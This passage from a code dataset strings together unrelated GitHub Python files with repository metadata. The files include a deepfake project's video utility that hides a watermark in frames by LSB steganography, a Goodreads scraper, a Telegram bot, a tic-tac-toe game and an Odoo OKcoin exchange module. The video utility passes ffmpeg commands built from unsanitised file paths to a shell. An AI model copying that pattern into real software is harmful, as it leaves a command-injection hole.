'True':\n # not silence run\n os.system(cmd)\n else:\n # silence run\n subprocess.run(cmd, shell=True, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)\n return new_video\n\n\ndef check_media_type(file_path):\n # Initialize a VideoCapture object\n cap = cv2.VideoCapture(file_path)\n\n # Count the number of frames\n frame_count = int(cap.get(cv2.CAP_PROP_FRAME_COUNT))\n\n # Clean up\n cap.release()\n\n # Check the number of frames to determine the type of media\n if frame_count > 1:\n return \"animated\"\n else:\n return \"static\"\n\n\ndef get_first_frame(file_path, source_current_time: float = 0):\n \"\"\"\n Get first frame from content\n :param file_path: file path\n :return: frame or NOne\n \"\"\"\n type_file = check_media_type(file_path)\n if type_file == \"static\":\n # It's an image or GIF\n img = cv2.imread(file_path)\n if img is not None:\n return img\n elif type_file == \"animated\":\n # It's a video\n cap = cv2.VideoCapture(file_path)\n # Get the frames per second of the video\n fps = cap.get(cv2.CAP_PROP_FPS)\n # Calculate the frame number\n num_frame = int(fps * source_current_time)\n # Set the video capture to the desired frame\n cap.set(cv2.CAP_PROP_POS_FRAMES, num_frame)\n\n ret, frame = cap.read()\n if ret:\n return frame\n else:\n raise ValueError(\"Could not read the video file.\")\n else:\n raise ValueError(\"Unsupported file format.\")\n\n return None\n\n\ndef save_frames(video: str, output_dir: str, rotate: int, crop: list, resize_factor: int):\n \"\"\"\n Extract frames from a video, apply resizing, rotation, and cropping, and save them to an output directory.\n\n :param video: path to the video file\n :param output_dir: path to the directory where frames should be saved\n :param rotate: number of 90-degree rotations\n :param crop: list with cropping coordinates [y1, y2, x1, x2]\n :param resize_factor: factor by which the frame should be resized\n :return: fps of the video, path to the directory containing frames\n \"\"\"\n print(\"Start reading video\")\n\n # Ensure the output directory exists\n os.makedirs(output_dir, exist_ok=True)\n\n video_stream = cv2.VideoCapture(video)\n fps = video_stream.get(cv2.CAP_PROP_FPS)\n frame_count = 0\n\n try:\n while True:\n still_reading, frame = video_stream.read()\n\n if not still_reading:\n break\n\n if resize_factor > 1:\n frame = cv2.resize(frame, (int(frame.shape[1] // resize_factor), int(frame.shape[0] // resize_factor)))\n\n for _ in range(rotate):\n frame = cv2.rotate(frame, cv2.ROTATE_90_CLOCKWISE)\n\n y1, y2, x1, x2 = crop\n x2 = x2 if x2 != -1 else frame.shape[1]\n y2 = y2 if y2 != -1 else frame.shape[0]\n\n frame = frame[y1:y2, x1:x2]\n\n # Save the frame to the output directory\n frame_filename = os.path.join(output_dir, f'frame{frame_count:04}.png')\n cv2.imwrite(frame_filename, frame)\n\n frame_count += 1\n\n finally:\n video_stream.release()\n\n print(f\"Number of frames saved: {frame_count}\")\n\n return fps, output_dir\n\n\n\ndef encrypted(video_path: str, save_dir: str, fn: int = 0):\n\n name = str(os.path.basename(os.path.dirname(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))))\n media_type = check_media_type(video_path)\n\n if media_type == \"animated\":\n # Video objects for src\n src = cv2.VideoCapture(video_path)\n src_w = int(src.get(3))\n src_h = int(src.get(4))\n src_fps = src.get(cv2.CAP_PROP_FPS)\n src_frame_cnt = src.get(cv2.CAP_PROP_FRAME_COUNT)\n\n # Load a dummy image to get the shape attributes\n sec_frame_original = np.zeros((src_h, src_w, 3), dtype=np.uint8)\n\n if not os.path.exists(os.path.join(save_dir, 'enc')):\n os.mkdir(os.path.join(save_dir, 'enc'))\n\n # Create a progress bar\n pbar = tqdm(total=int(src_frame_cnt), unit='frames')\n\n while True:\n ret, src_frame = src.read()\n\n if ret == False:\n break\n\n # Create a copy of the dummy frame\n sec_frame = sec_frame_original.copy()\n\n # Put the text onto the dummy frame\n font_scale = int(max(src_w, src_h) // 600)\n font_thickness = int(font_scale // 0.5)\n\n # Define text position\n text_x = src_w // 4\n text_y = src_h // 2\n\n # Get the region where the text will be placed\n text_size = cv2.getTextSize(name, cv2.FONT_HERSHEY_SIMPLEX, font_scale, font_thickness)[0]\n region = src_frame[text_y - text_size[1]:text_y, text_x:text_x + text_size[0]]\n\n # Compute the mean color of the region\n mean_color = cv2.mean(region)[:3]\n\n # Compute the contrasting color\n contrast_color = tuple([255 - int(x) for x in mean_color])\n\n # Adjusting the coordinates to correctly position the text\n height, width = src_frame.shape[:2]\n\n # Get the size of the text\n (text_width, text_height), baseline = cv2.getTextSize(name, cv2.FONT_HERSHEY_SIMPLEX, font_scale, font_thickness)\n\n # Center positions\n center_x = width // 2\n center_y = height // 2\n\n # Define potential positions with padding along the edges (adjust as necessary)\n positions = [\n (0, text_height),\n (0, center_y + text_height // 2),\n (center_x - text_width // 2, text_height),\n (width - text_width, text_height),\n (0, height - baseline),\n (width - text_width, height - baseline),\n (center_x - text_width // 2, height - baseline),\n (width - text_width, center_y + text_height // 2),\n (int(width * 0.25) - text_width // 2, text_height),\n (int(width * 0.75) - text_width // 2, text_height),\n (int(width * 0.25) - text_width // 2, height - baseline),\n (int(width * 0.75) - text_width // 2, height - baseline),\n None, None, None\n ]\n\n # In each call to the method, select one random positions from the list\n selected_positions = random.sample(positions, 1)\n\n # Put text at the selected positions\n for pos in selected_positions:\n if pos is not None:\n cv2.putText(sec_frame, name, pos, cv2.FONT_HERSHEY_SIMPLEX, font_scale, contrast_color, font_thickness, cv2.LINE_AA)\n\n # Encryption for LSB 3 bits\n encrypted_img = (src_frame & 0b11111000) | (sec_frame >> 6 & 0b00000111)\n\n fn = fn + 1\n cv2.imwrite(os.path.join(save_dir, \"enc\", \"{}.png\".format(fn)), encrypted_img)\n\n pbar.update(1)\n\n pbar.close()\n src.release()\n\n # Delete encrypted video if already exists\n file_name = str(uuid.uuid4())+'.mp4'\n file_path = os.path.join(save_dir, file_name)\n\n # Save the video using ffmpeg as a lossless video; frame rate is kept the same\n cmd = f\"ffmpeg -framerate {src_fps} -i {os.path.join(save_dir, 'enc', '%d.png')} -c:v copy {file_path}\"\n if os.environ.get('DEBUG', 'False') == 'True':\n # not silence run\n os.system(cmd)\n else:\n # silence run\n subprocess.run(cmd, shell=True, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)\n # Delete the temporary image sequence folder\n shutil.rmtree(os.path.join(save_dir, 'enc'))\n\n else:\n # If the media is an image\n src_frame = cv2.imread(video_path)\n src_h, src_w = src_frame.shape[:2]\n\n # Load a dummy image to get the shape attributes\n sec_frame_original = np.zeros((src_h, src_w, 3), dtype=np.uint8)\n\n # Create a copy of the dummy frame\n sec_frame = sec_frame_original.copy()\n\n # Put the text onto the dummy frame\n font_scale = int(max(src_w, src_h) // 500)\n font_thickness = int(font_scale // 0.5)\n\n # Define text position\n text_x = src_w // 4\n text_y = src_h // 2\n\n # Get the region where the text will be placed\n text_size = cv2.getTextSize(name, cv2.FONT_HERSHEY_SIMPLEX, font_scale, font_thickness)[0]\n region = src_frame[text_y - text_size[1]:text_y, text_x:text_x + text_size[0]]\n\n # Compute the mean color of the region\n mean_color = cv2.mean(region)[:3]\n\n # Compute the contrasting color\n contrast_color = tuple([255 - int(x) for x in mean_color])\n\n # Adjusting the coordinates to correctly position the text\n height, width = src_frame.shape[:2]\n\n # Get the size of the text\n (text_width, text_height), baseline = cv2.getTextSize(name, cv2.FONT_HERSHEY_SIMPLEX, font_scale,\n font_thickness)\n\n # Center positions\n center_x = width // 2\n center_y = height // 2\n\n # Define potential positions with padding along the edges (adjust as necessary)\n positions = [\n (0, text_height),\n (0, center_y + text_height // 2),\n (center_x - text_width // 2, text_height),\n (width - text_width, text_height),\n (0, height - baseline),\n (width - text_width, height - baseline),\n (center_x - text_width // 2, height - baseline),\n (width - text_width, center_y + text_height // 2),\n (int(width * 0.25) - text_width // 2, text_height),\n (int(width * 0.75) - text_width // 2, text_height),\n (int(width * 0.25) - text_width // 2, height - baseline),\n (int(width * 0.75) - text_width // 2, height - baseline),\n ]\n\n # In each call to the method, select one random positions from the list\n selected_positions = random.sample(positions, 1)\n\n # Put text at the selected positions\n for pos in selected_positions:\n cv2.putText(sec_frame, name, pos, cv2.FONT_HERSHEY_SIMPLEX, font_scale, contrast_color, font_thickness, cv2.LINE_AA)\n\n # Encryption for LSB 3 bits\n encrypted_img = (src_frame & 0b11111000) | (sec_frame >> 6 & 0b00000111)\n\n # Save the encrypted image\n file_name = str(uuid.uuid4()) + '.png'\n file_path = os.path.join(save_dir, file_name)\n cv2.imwrite(file_path, encrypted_img)\n\n return file_name\n","repo_name":"wladradchenko/wunjo.wladradchenko.ru","sub_path":"portable/src/deepfake/src/utils/videoio.py","file_name":"videoio.py","file_ext":"py","file_size_in_byte":15261,"program_lang":"python","lang":"en","doc_type":"code","stars":404,"dataset":"github-code","pt":"21"} +{"seq_id":"31153398802","text":"# -*- coding:utf-8 -*-\nclass WordProcessing:\n def __init__(self, tagger):\n self.res_dic = {}\n self.tagger = tagger\n\n def morphological(self, text, word_class):\n node = self.tagger.parseToNode(text)\n\n i=0\n while node:\n word_feature = node.feature.split(',')\n if (word_feature[6] != '*') and (word_feature[0] in word_class):\n self.res_dic[str(i)] = [word_feature[6], word_feature[0]]\n i+=1\n node = node.next\n\n\n def set_res_dic(self, text, word_classes):\n for word_class in word_classes:\n self.morphological(text, word_class)\n\n\nif __name__ == \"__main__\":\n word_classes = ['名詞', '動詞']\n text = '中居正広の金曜日のスマたちへ逃げ恥,新垣結衣へ見た'\n\n import MeCab\n m = MeCab.Tagger(\"-d /usr/local/lib/mecab/dic/mecab-ipadic-neologd\")\n wp = WordProcessing(m)\n wp.set_res_dic(text, word_classes)\n\n print(wp.res_dic)\n print(m.parse (text))","repo_name":"kawamura-2022/MeCab_API","sub_path":"webapp/morphlogical.py","file_name":"morphlogical.py","file_ext":"py","file_size_in_byte":1007,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"23638596063","text":"\nimport requests\nimport csv\n\n# Constants\nGRAPH_URL_PREFIX = 'https://graph.workplace.com/'\nGRAPH_URL_SEPARATOR = '/'\nGRAPH_URL_MEMBER_EDGE = 'members'\nGRAPH_URL_EMAIL_FIELD = '?email='\n\n# Variables\naccess_token = 'your_access_token'\ngroup_id = 'your_group_id'\nfile_name = 'email_list.csv'\n\n# Methods\ndef sendAdditionRequest(access_token, endpoint):\n headers = buildHeader(access_token)\n result = requests.post(endpoint, headers=headers)\n result_console = endpoint + ' - adding user to group' + ' -> ' + result.text\n print (result_console)\n\ndef buildHeader(access_token):\n return {'Authorization': 'Bearer ' + access_token, \"User-Agent\": \"GithubRep-AddUsersToGroup\"}\n\ndef addUserToGroup(access_token, group_id, email):\n endpoint = GRAPH_URL_PREFIX + group_id + GRAPH_URL_SEPARATOR + GRAPH_URL_MEMBER_EDGE + GRAPH_URL_EMAIL_FIELD + email\n sendAdditionRequest(access_token, endpoint)\n\n\n## START\n\nwith open(file_name, newline='') as f:\n reader = csv.reader(f)\n next(reader) #Skip header\n for row in reader:\n addUserToGroup(access_token, group_id, row[0])\n","repo_name":"fbsamples/workplace-platform-samples","sub_path":"SupportScripts/Python/AddUsersToGroup/add_users_group.py","file_name":"add_users_group.py","file_ext":"py","file_size_in_byte":1089,"program_lang":"python","lang":"en","doc_type":"code","stars":179,"dataset":"github-code","pt":"21"} +{"seq_id":"1138446140","text":"def check(list):\n return len(set(list)) == 1\n\n\nfor _ in range(int(input())):\n n,k=map(int,input().split())\n list1=[int(i) for i in input().split()]\n count=0\n for i in range(n//2):\n if list1[i]!=list1[n-1-i]:\n count+=1\n if n%2!=0 :\n if n>3:\n if list1[n//2]==list1[n//2 -1]==list1[n//2 +1]:\n count+=1\n elif n%2==0:\n count-=1\n if check(list1):\n print(0)\n else:\n print(count)","repo_name":"programophile/Codeforces-Problems","sub_path":"Vika and the bridge.py","file_name":"Vika and the bridge.py","file_ext":"py","file_size_in_byte":471,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"25962121220","text":"import requests\nimport time\nfrom bs4 import BeautifulSoup\nimport pandas as pd\nimport re\nfrom concurrent.futures import ThreadPoolExecutor\n\n# Using Bool Parameter to limit the number of pages\nbool_param = True\n\n##get start time for calculation scraping time \nstart_time = time.time()\n\n# Create an instance of requests.Session for efficient network requests\nsession = requests.Session()\n\n# Collect pagination links\nurl = 'https://www.goodreads.com/list/show/22031.Nonfiction_With_a_Side_of_Self_Help?page=1'\nresponse = session.get(url)\nsoup = BeautifulSoup(response.content, 'html.parser')\n\n\n# Extract pagination links for first 10 page\n\npagination_links = soup.select('div.pagination a')\npagination_df = pd.DataFrame(columns=['page', 'link'])\npagination_df = pd.concat([pagination_df, pd.DataFrame({'page': [1], 'link': [url]})], ignore_index=True)\n\nfor link in pagination_links:\n page = link.text.strip()\n link_url = 'https://www.goodreads.com' + link['href']\n if len(page) <= 2:\n pagination_df = pd.concat([pagination_df, pd.DataFrame({'page': [page], 'link': [link_url]})], ignore_index=True)\n\n#save the pagination links to a CSV file also for later use \npagination_df.to_csv('C:\\\\Users\\\\Gizem\\\\Desktop\\\\UW\\\\2nd\\\\WEB_SCRAPING\\\\PROJECT\\\\BS\\\\pagination_links.csv', index=False)\n\n# Collect book links\n\n#First read pagination links file to get book links\npagination_df = pd.read_csv('C:\\\\Users\\\\Gizem\\\\Desktop\\\\UW\\\\2nd\\\\WEB_SCRAPING\\\\PROJECT\\\\BS\\\\pagination_links.csv')\nbook_links = pd.DataFrame(columns=['link'])\n\ndef extract_book_links(page):\n response = session.get(page)\n soup = BeautifulSoup(response.content, 'html.parser')\n print(\"Pagination\", page)\n\n links = soup.select('a.bookTitle')\n book_links = []\n for link in links:\n book_link = 'https://www.goodreads.com' + link['href']\n book_links.append(book_link)\n return book_links\n\n# Use ThreadPoolExecutor to extract book links in parallel which helps reduce scraping time\n\nwith ThreadPoolExecutor() as executor:\n results = executor.map(extract_book_links, pagination_df['link'])\n for result in results:\n book_links = pd.concat([book_links, pd.DataFrame({'link': result})], ignore_index=True)\n\n# Save book links to a CSV file also for furher usage\nbook_links.to_csv('C:\\\\Users\\\\Gizem\\\\Desktop\\\\UW\\\\2nd\\\\WEB_SCRAPING\\\\PROJECT\\\\BS\\\\book_links.csv', index=False)\n\n# Collect book details\n\n###first read book_links.csv file to get book details\nbook_links = pd.read_csv('C:\\\\Users\\\\Gizem\\\\Desktop\\\\UW\\\\2nd\\\\WEB_SCRAPING\\\\PROJECT\\\\BS\\\\book_links.csv')\nif bool_param:\n book_links = book_links[1:101]\n\nbooks = pd.DataFrame(columns=[\"link\", \"title\", \"author_name\", \"author_link\", \"kindle_price\",\n \"average_rating\", \"rating_count\", \"review_count\", \"n_pages\"])\n\n###create loop for GET request to handle potential request failures and retries the request until a successful response is obtained\n\ndef parse_book_details(url):\n response = None\n while response is None:\n try:\n response = session.get(url)\n except requests.exceptions.RequestException:\n print(f\"Request failed for {url}. Retrying...\")\n time.sleep(1)\n\n## 1 second delay is added before parsing to ensure proper server \n soup = BeautifulSoup(response.content, 'html.parser')\n time.sleep(1)\n \n ##extract book details from the page \n ###The try-except blocks are added to handle potential errors or exceptions that \n # may occur during the extraction of specific book details from the parsed HTML content.\n\n try:\n title_element = soup.find('h1', attrs={'data-testid': 'bookTitle'})\n title = title_element.text.strip() if title_element else ''\n except:\n title = ''\n \n try:\n author_name_element = soup.find('span', class_='ContributorLink__name')\n author_name = author_name_element.text.strip() if author_name_element else ''\n except:\n author_name = ''\n \n try:\n author_link_element = soup.find('a', class_='ContributorLink')\n author_link = author_link_element['href'] if author_link_element else ''\n except:\n author_link = ''\n \n try:\n kindle_price_element = soup.find('span', class_='Button__labelItem', text=re.compile(r'Kindle'))\n kindle_price = kindle_price_element.text.strip() if kindle_price_element else ''\n except:\n kindle_price = ''\n\n \n try:\n average_rating_element = soup.find('div', class_='RatingStatistics__column')\n average_rating = average_rating_element.text.strip() if average_rating_element else ''\n except:\n average_rating = ''\n \n try:\n rating_count_element = soup.find('div', class_='BookPageMetadataSection__ratingStats').find('span', {'data-testid': 'ratingsCount'})\n rating_count = rating_count_element.text.strip() if rating_count_element else ''\n except:\n rating_count = ''\n \n try:\n review_count_element = soup.find('div', class_='BookPageMetadataSection__ratingStats').find('span', {'data-testid': 'reviewsCount'})\n review_count = review_count_element.text.strip() if review_count_element else ''\n except:\n review_count = ''\n \n try:\n pages_element = soup.find('p', attrs={'data-testid': 'pagesFormat'})\n n_pages = pages_element.text.strip() if pages_element else ''\n except:\n n_pages = ''\n \n details = pd.DataFrame({\"link\": [url], \"title\": [title], \"author_name\": [author_name],\n \"author_link\": [author_link], \"kindle_price\": [kindle_price],\n \"average_rating\": [average_rating], \"rating_count\": [rating_count],\n \"review_count\": [review_count], \"n_pages\": [n_pages]})\n\n return details\n\n\ndef scrape_book_details(link):\n details = parse_book_details(link)\n\n while details['title'].values[0] == '':\n print(f\"Title not found for {link}. Retrying...\")\n details = parse_book_details(link)\n\n return details\n\n# Use ThreadPoolExecutor to scrape book details in parallel\n\nwith ThreadPoolExecutor() as executor:\n results = executor.map(scrape_book_details, book_links['link'])\n for result in results:\n books = pd.concat([books, result], ignore_index=False)\n print(\"Book\", result['link'].values[0])\n\n# Final data manipulation\npattern = r'[^0-9,]'\nbooks['rating_count'] = books['rating_count'].apply(lambda x: re.sub(pattern, '', x))\nbooks['review_count'] = books['review_count'].apply(lambda x: re.sub(pattern, '', x))\n\n# Save book details to a CSV file\nbooks.to_csv('C:\\\\Users\\\\Gizem\\\\Desktop\\\\UW\\\\2nd\\\\WEB_SCRAPING\\\\PROJECT\\\\BS\\\\book_details.csv', index=False)\n\n#get the end time and calculate scraping time in Seconds\nend_time = time.time()\ntotal_time = end_time - start_time\nprint(\"Scraping time:\", total_time, \"seconds\")\n","repo_name":"huseyinpolat-ds/WS_2023_project","sub_path":"soup/bs.py","file_name":"bs.py","file_ext":"py","file_size_in_byte":6875,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"35967027463","text":"import string\nfrom nltk.corpus import stopwords\nfrom nltk.tokenize import word_tokenize\nfrom nltk.stem import WordNetLemmatizer\n\n\ndef clean(text):\n for punctuation in string.punctuation:\n text = text.replace(punctuation, ' ') # Remove Punctuation\n lowercased = text.lower() # Lower Case\n tokenized = word_tokenize(lowercased) # Tokenize\n words_only = [word for word in tokenized if word.isalpha()\n ] # Remove numbers\n stop_words = set(stopwords.words('english')) # Make stopword list\n # Remove Stop Words\n without_stopwords = [word for word in words_only if not word in stop_words]\n lemma = WordNetLemmatizer() # Initiate Lemmatizer\n lemmatized = [lemma.lemmatize(word)\n for word in without_stopwords] # Lemmatize\n return lemmatized\n\n\n# data['clean_text'] = data.text.apply(clean)\n# data['clean_text'] = data['clean_text'].astype('str')\n\n","repo_name":"DataASG/Fake_news","sub_path":"preprocessing.py","file_name":"preprocessing.py","file_ext":"py","file_size_in_byte":916,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"11173074022","text":"## Santosh Khadka - Tic Tac Toe Game \n\n#Globals\nrow1 = ['-', '-', '-']\nrow2 = ['-', '-', '-']\nrow3 = ['-', '-', '-']\n\ndef print_start():\n print(\"===============================\")\n print(' Lets play Tic-Tac-Toe!')\n print(\"===============================\")\n print(\"[Type 'exit' to leave anytime.]\")\n print()\n x = 0\n while x == 0:\n choice = input(\"Would you like to be X or O?\")\n if (choice == 'x') or (choice == 'X') or (choice == 'o') or (choice == 'O'):\n print()\n return choice.upper()\n else:\n print('Invalid input try again..')\n \n\ndef print_board(r1, r2, r3):\n #h_bar = ' -----------'\n h_bar = ' #############'\n h_bar = ' -------------'\n print(' 1 2 3')\n print(h_bar)\n print('A: |',r1[0],'|',r1[1],'|',r1[2],'|')\n print(h_bar)\n print('B: |',r2[0],'|',r2[1],'|',r2[2],'|')\n print(h_bar)\n print('C: |',r3[0],'|',r3[1],'|',r3[2],'|')\n print(h_bar)\n print()\n \ndef get_input():\n #location = input(\"Input column letter then row number (i.e. c1): \")\n colRow = [0,0]\n x = 0\n while x == 0:\n print(\"Pick a location to add your piece...\")\n location = input(\"Input column letter then row number (i.e. c1): \")\n if str(location).lower() == \"exit\":\n quit()\n #print(location[0])\n #print(location[1])\n if ((str(location[0]).lower() == 'a') or (str(location[0]).lower() =='b') or (str(location[0]).lower() =='c')) and ((location[1] == '1') or (location[1] == '2') or (location[1] == '3')):\n break\n else:\n print(\"Invalid input, try again...\")\n \n column = str(location[0].lower())\n if column == 'a':\n column = 1\n elif column == 'b':\n column = 2\n elif column == 'c':\n column = 3 \n row = int(location[1])\n colRow[0] = column\n colRow[1] = row\n return colRow\n\ndef replace_board(col, row, choice):\n global row1\n global row2\n global row3\n # if row == 1:\n # row1[col] = \n # elif row == 2:\n # elif row == 3:\ndef reset_board():\n global row1\n global row2\n global row3\n \n row1 = ['-', '-', '-']\n row2 = ['-', '-', '-']\n row3 = ['-', '-', '-']\n\ndef end_game(winner):\n if winner != 'computer':\n print(\"Congratulations you WON!\")\n else:\n print(\"Better luck next time!\")\n \n choice = input(\"Make your next choice:\")\n if choice == 1:\n print(\"Ok, lets play again!\")\n reset_board()\n return(print_start())\n elif choice == 2:\n print(\"Thanks for playing, bye!\")\n quit()\n \n \n\ndef main():\n global row1\n global row2\n global row3\n \n x = 0\n piece = print_start()\n #print_start()\n \n while x == 0:\n print_board(row1, row2, row3) \n print(get_input())\n print()\n\nif __name__ == \"__main__\":\n main()","repo_name":"skhadka007/learning_algos","sub_path":"Learning-python/Section 7 - Milestone Project 1/tictactoe_v1.py","file_name":"tictactoe_v1.py","file_ext":"py","file_size_in_byte":2926,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"10357011586","text":"from models.func_2 import change_photo_2\nfrom aiogram.dispatcher.filters import Text\nfrom aiogram.dispatcher import Dispatcher\nfrom aiogram import types\nfrom aiogram.types import ContentType\nfrom aiogram.types.input_media import InputFile\nfrom creat_bot import bot\n\nstart_buttons = [\"Информация о боте\", \"Загрузить фото\"]\n\n\nasync def cmd_start(message: types.Message):\n keyboard = types.ReplyKeyboardMarkup(resize_keyboard=True, input_field_placeholder='Нажмите на кнопку ☟')\n # клавиатура при старте\n name_user = message.from_user.first_name # получаем имя пользователя\n keyboard.add(*start_buttons)\n await message.answer(f\"Привет🙋, {name_user}!\\nЯ бот. Ниже указаны команды, которые, я могу выполнять\\n\",\n reply_markup=keyboard)\n # отвечаем пользователю после старта\n\n\nasync def cmd_download(message: types.Message):\n name_user = message.from_user.first_name\n await message.answer(f\"{name_user} отправьте мне фотографию с людьми, я их обработаю и верну вам\")\n\n\nasync def cmd_media(message: types.Message):\n name_user = message.from_user.first_name\n file_id = message.photo[-1].file_id\n file = await bot.get_file(file_id)\n file_path = file.file_path\n image_name = f\"{file_id}.jpg\"\n await bot.download_file(file_path=file_path, destination=f\"models/download_photo/{image_name}\", timeout=1)\n change_photo_2(image_name=image_name)\n await message.answer(text=\"Фото получено\")\n photo = InputFile(f\"models/save_photo/out{image_name}\")\n await message.answer_photo(photo=photo)\n\n\n# отвечаем на все неизвестные сообщения\nasync def cmd_answer_all(message: types.Message):\n await message.answer('Не знаю такой команды.\\nВоспользуйтесь командой /start')\n\n\ndef register_handlers_users(dp: Dispatcher):\n dp.register_message_handler(cmd_start, commands='start')\n dp.register_message_handler(cmd_download, commands='download')\n dp.register_message_handler(cmd_download, Text(equals=start_buttons[1], ignore_case=True))\n dp.register_message_handler(cmd_media, content_types=ContentType.PHOTO)\n dp.register_message_handler(cmd_answer_all)\n","repo_name":"Nikc-mk/ODS_ML_SD","sub_path":"handlers/main_handlers.py","file_name":"main_handlers.py","file_ext":"py","file_size_in_byte":2424,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"33297748448","text":" # -*- coding: utf-8 -*-\nfrom odoo import _, fields, models\nfrom odoo.exceptions import UserError\nimport requests, logging, json, datetime, hmac, base64\nimport numpy as np\n_logger = logging.getLogger(__name__)\n\n\nclass OKcoinInstance(models.Model):\n _name = 'okcoin.instance'\n _description = 'OKcoin V5 Instance'\n\n name = fields.Char(string='Name')\n server_url = fields.Char(string='Server URL')\n api_key = fields.Char(string='API Key')\n secret_key = fields.Char(string='Secret Key')\n pass_phrase = fields.Char(string='Password')\n maker_taker = fields.Selection([('taker', 'Taker'), ('maker', 'Maker')])\n convert_percent = fields.Integer()\n state = fields.Selection(\n [(\"draft\", \"Not Confirmed\"), (\"active\", \"Active\"), (\"inactive\", \"Inactive\")],\n default=\"draft\",\n string=\"State\",\n )\n\n\n def get_okcoin_timestamp(self):\n timestamp = datetime.datetime.now(datetime.timezone.utc).strftime('%Y-%m-%dT%H:%M:%S.%f')[:-3] + \"Z\"\n print(timestamp)\n return timestamp\n\n def get_signature(self, t, method, request_path, body=None):\n if str(body) == '{}' or str(body) == 'None' or body == None:\n body = ''\n message = str(t) + str.upper(method) + request_path + str(body)\n mac = hmac.new(bytes(self.secret_key, encoding='utf8'), bytes(message, encoding='utf-8'), digestmod='sha256')\n d = mac.digest()\n return base64.b64encode(d)\n\n def get_header(self, sig, t):\n CONTENT_TYPE = 'Content-Type'\n OK_ACCESS_KEY = 'OK-ACCESS-KEY'\n OK_ACCESS_SIGN = 'OK-ACCESS-SIGN'\n OK_ACCESS_TIMESTAMP = 'OK-ACCESS-TIMESTAMP'\n OK_ACCESS_PASSPHRASE = 'OK-ACCESS-PASSPHRASE'\n APPLICATION_JSON = 'application/json'\n GET = 'GET'\n POST = 'POST'\n header = dict()\n header[CONTENT_TYPE] = APPLICATION_JSON\n header[OK_ACCESS_KEY] = self.api_key\n header[OK_ACCESS_SIGN] = sig\n header[OK_ACCESS_TIMESTAMP] = t\n header[OK_ACCESS_PASSPHRASE] = self.pass_phrase\n return header\n\n def parse_params_to_str(self, params):\n url = '?'\n for key, value in params.items():\n url = url + str(key) + '=' + str(value) + '&'\n return url[0:-1]\n\n def query(self, type, request_path, body=''):\n if type == \"POST\":\n body = json.dumps(body)\n print(body)\n else:\n if body != '':\n body = self.parse_params_to_str(body)\n timestamp = self.get_okcoin_timestamp()\n print(body)\n signature = self.get_signature(timestamp, type, request_path, body)\n header = self.get_header(signature, timestamp)\n if type == 'GET':\n response = requests.get(self.server_url + request_path + body, headers=header)\n else:\n print(self.server_url+ request_path)\n response = requests.post(self.server_url + request_path, data=body, headers=header)\n return response\n\n def test_okcoin_connection(self):\n try:\n request_path = '/api/v5/account/balance'\n body = ''\n response = self.query('GET', request_path, body)\n is_success = True if response.status_code == 200 else False\n return is_success\n except Exception as e:\n raise UserError(_(\"Test Connection Error: %s\", e.args))\n\n def action_test_connection(self):\n is_success = self.test_okcoin_connection()\n type = (\n \"success\"\n if is_success\n else \"danger\"\n )\n messages = (\n \"Everything seems properly set up!\"\n if is_success\n else \"Server credential is wrong. Please check credential.\"\n )\n title = _(\"Connection Testing\")\n\n return {\n \"type\": \"ir.actions.client\",\n \"tag\": \"display_notification\",\n \"params\": {\n \"title\": title,\n \"message\": messages,\n \"sticky\": False,\n \"type\": type\n },\n }\n\n def action_activate(self):\n is_success = self.test_okcoin_connection()\n if is_success:\n # Get Conversion Rate\n #self.conversion_rate = self.action_get_conversion_rate_source()\n self.state = 'active'\n # Auto create Account Journal and POS Payment Method at the first Activate\n journal = self.env['account.journal'].search(\n [(\"use_okcoin_server\", \"=\", True), (\"type\", \"=\", \"bank\"), ('company_id', '=', self.env.company.id)],\n limit=1)\n if not journal:\n journal = self.env['account.journal'].search(\n [(\"type\", \"=\", \"bank\"), ('company_id', '=', self.env.company.id)], limit=1)\n new_okcoin_server_journal = journal.copy()\n new_okcoin_server_journal.write({\n 'name': 'OKcoin Server',\n 'use_okcoin_server': True,\n 'code': 'OKcoin',\n 'okcoin_server_instance_id': self.id\n })\n new_okcoin_server_pos_payment_method = self.env['pos.payment.method'].create({\n 'name': 'OKcoin Server',\n 'company_id': self.env.company.id,\n 'journal_id': new_okcoin_server_journal.id\n }\n )\n new_okcoin_server_pos_payment_method = self.env['pos.payment.method'].create({\n 'name': 'OKcoin Server (Lightning)',\n 'company_id': self.env.company.id,\n 'journal_id': new_okcoin_server_journal.id\n }\n )\n\n def action_deactivate(self):\n self.state = 'inactive'\n\n\n def action_create_invoice_lightning(self, pos_payment_obj): # creates lightning invoice\n try:\n invoiced_info = self.get_amount_sats(pos_payment_obj) # gets the invoiced satoshi amount and conversion rate from get_amount_sats function\n amount_btc = invoiced_info['invoiced_sat_amount']/100000000 # converts sats to millisats as required by btcpayserver\n formatted_amount_btc = np.format_float_positional(amount_btc, trim='-')\n request_path = '/api/v5/asset/deposit-lightning?ccy=BTC&amt=' + str(formatted_amount_btc) + '&to=18'\n body = ''\n type = \"GET\"\n response = self.query(type, request_path, body)\n response_json = response.json()\n result = response_json.get('data')[0] if response.status_code == 200 else None\n result.update(invoiced_info) # attach invoiced info (sat amount and conversion rate to API response\n return result # returns merged resuls\n except Exception as e:\n _logger.info(\" lightning invoice exception\")\n raise UserError(_(\"Create OKcoin Lightning Invoice: %s\", e.args))\n\n\n def action_get_conversion_rate(self): #obtains conversion rate from OKcoin server\n _logger.info('called get conversion rate')\n try:\n request_path = '/api/v5/market/ticker?instId=BTC-USD'\n body = ''\n type = \"GET\"\n response = self.query(type, request_path, body)\n response_json = response.json()\n result = response_json.get('data')[0].get('last') if response.status_code == 200 else None\n return result\n except Exception as e:\n _logger.info(\"conversion rate exception\")\n raise UserError(_(\"Get Conversion Rate: %s\", e.args))\n\n def get_amount_sats(self, pos_payment_obj): #obtains amount of satoshis to invoice by calling action_get_conversion_rate and and doing the math, returns dict of both values\n try:\n okcoin_conversion_rate = self.action_get_conversion_rate()\n amount_sats = 